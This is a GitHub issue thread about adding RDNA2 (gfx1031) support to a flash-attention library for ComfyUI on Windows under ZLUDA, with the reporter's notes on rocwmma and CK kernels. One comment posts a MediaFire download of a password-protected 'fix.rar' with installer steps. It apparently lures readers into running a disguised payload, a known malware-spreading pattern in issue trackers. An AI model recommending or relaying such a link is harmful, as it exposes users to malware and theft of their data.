### ISSUE TITLE
any luck for some rdna2?

### ISSUE THREAD

**Issue by xhebox** [Repeerc/ComfyUI-flash-attention-rdna3-win-zluda#2]
gfx1031, ck_fttn_lib.dll seems to be compiled for rdna3 only.

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by xhebox** [comment]
I've checked a little bit, rocwmma is impossible to implement, since it is solely for hardware-accelerated devices.

CK kernel is possible on rdna2, though.
